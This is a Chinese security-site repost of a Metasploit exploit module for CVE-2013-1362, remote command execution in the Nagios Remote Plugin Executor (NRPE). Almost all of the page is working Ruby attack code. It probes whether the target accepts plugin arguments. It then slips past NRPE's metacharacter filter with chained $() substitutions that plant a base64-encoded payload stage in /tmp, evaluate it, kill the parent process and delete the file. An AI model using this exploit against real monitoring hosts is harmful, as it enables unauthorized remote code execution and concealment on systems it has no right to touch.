首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nagios Remote Plugin Executor Arbitrary Command Execution
来源:metasploit.com 作者:Pereir 发布时间:2013-04-12  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
#

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
			'Description' => %q{
					The Nagios Remote Plugin Executor (NRPE) is installed to allow a central
				Nagios server to actively poll information from the hosts it monitors. NRPE
				has a configuration option dont_blame_nrpe which enables command-line arguments
				to be provided remote plugins. When this option is enabled, even when NRPE makes
				an effort to sanitize arguments to prevent command execution, it is possible to
				execute arbitrary commands.
			},
			'Author'      =>
				[
					'Rudolph Pereir', # Vulnerability discovery
					'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module
				],
			'References'  =>
				[
					[ 'CVE', '2013-1362' ],
					[ 'OSVDB', '90582'],
					[ 'BID', '58142'],
					[ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']
				],
			'License'     => MSF_LICENSE,
			'Platform'    => 'unix',
			'Arch'        => ARCH_CMD,
			'Payload'     =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'perl python ruby bash telnet',
							# *_perl, *_python and *_ruby work if they are installed
						}
				},
			'Targets'     =>
				[
					[ 'Nagios Remote Plugin Executor prior to 2.14', {} ]
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Feb 21 2013'
		))

		register_options(
			[
				Opt::RPORT(5666),
				OptEnum.new('NRPECMD', [
					true,
					"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg",
					'check_procs',
					['check_procs', 'check_users', 'check_load', 'check_disk']
				]),
				# Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below
				OptBool.new('NRPESSL', [ true,  "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true])
			], self.class)
	end

	def send_message(message)
		packet = [
			2,       # packet version
			1,       # packet type, 1 => query packet
			0,       # checksum, to be added later
			0,       # result code, discarded for query packet
			message, # the command and arguments
			0        # padding
		]
		packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum
		begin
			self.sock.put(packet.pack("nnNna1024n")) #send the packet
			res = self.sock.get_once # get the response
		rescue ::EOFError => eof
			res = ""
		end

		return res.unpack("nnNnA1024n")[4] unless res.nil?
	end

	def setup
		@ssl_socket = nil
		@force_ssl = false
		super
	end

	def exploit

		if check != Exploit::CheckCode::Vulnerable
			fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections")
		end

		stage = "setsid nohup #{payload.encoded} & "
		stage = Rex::Text.encode_base64(stage)
		# NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :)
		command = datastore['NRPECMD']
		command << "!"
		command << "$($(rm -f /tmp/$)" 	# Delete the file if it exists
		# need a way to write to a file without using redirection (>)
		# cant count on perl being on all linux hosts, use GNU Sed
		# TODO: Probably a better way to do this, some hosts may not have a /tmp
		command << "$(cp -f /etc/passwd /tmp/$)" # populate the file with at least one line of text
		command << "$(sed 1i#{stage} -i /tmp/$)" # prepend our stage to the file
		command << "$(sed q -i /tmp/$)" # delete the rest of the lines after our stage
		command << "$(eval $(base64 -d /tmp/$) )" # decode and execute our stage, base64 is in coreutils right?
		command << "$(kill -9 $)" # kill check_procs parent (popen'd sh) so that it never executes
		command << "$(rm -f /tmp/$))" # clean the file with the stage
		connect
		print_status("Sending request...")
		send_message(command)
		disconnect
	end

	def check
		print_status("Checking if remote NRPE supports command line arguments")

		begin
			# send query asking to run "fake_check" command with command substitution in arguments
			connect
			res = send_message("__fake_check!$()")
			# if nrpe is configured to support arguments and is not patched to add $() to
			# NASTY_META_CHARS then the service will return:
			#  NRPE: Command '__fake_check' not defined
			if res =~ /not defined/
				return Exploit::CheckCode::Vulnerable
			end
		# Otherwise the service will close the connection if it is configured to disable arguments
		rescue EOFError => eof
			return Exploit::CheckCode::Safe
		rescue Errno::ECONNRESET => reset
			unless datastore['NRPESSL'] or @force_ssl
				print_status("Retrying with ADH SSL")
				@force_ssl = true
				retry
			end
			return Exploit::CheckCode::Safe
		rescue => e
			return Exploit::CheckCode::Unknown
		end
		# TODO: patched version appears to go here
		return Exploit::CheckCode::Unknown

	end

	# NRPE uses unauthenticated Annonymous-Diffie-Hellman

	# setting the global SSL => true will break as we would be overlaying
	# an SSLSocket on another SSLSocket which hasnt completed its handshake
	def connect(global = true, opts={})

		self.sock = super(global, opts)

		if datastore['NRPESSL'] or @force_ssl
			ctx = OpenSSL::SSL::SSLContext.new("TLSv1")
			ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
			ctx.ciphers = "ADH"

			@ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)

			@ssl_socket.connect

			self.sock.extend(Rex::Socket::SslTcp)
			self.sock.sslsock = @ssl_socket
			self.sock.sslctx  = ctx
		end

		return self.sock
	end

	def disconnect
		@ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl
		super
	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ruby Gem kelredd-pruview 0.3.8
·KNet Web Server 1.04b - Stack
·MongoDB nativeHelper.apply Rem
·AT-TFTP Server 2.0 - Stack Bas
·ircd-hybrid 8.0.5 Denial Of Se
·MinaliC Webserver 2.0.0 - Buff
·TRENDNet IP Cam Authentication
·Ruby Gem md2pdf Command Inject
·DLink DIR-645 / DIR-815 diagno
·Free Float FTP Server USER Com
·Adobe ColdFusion APSB13-03 Rem
·SAP ConfigServlet OS Command E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved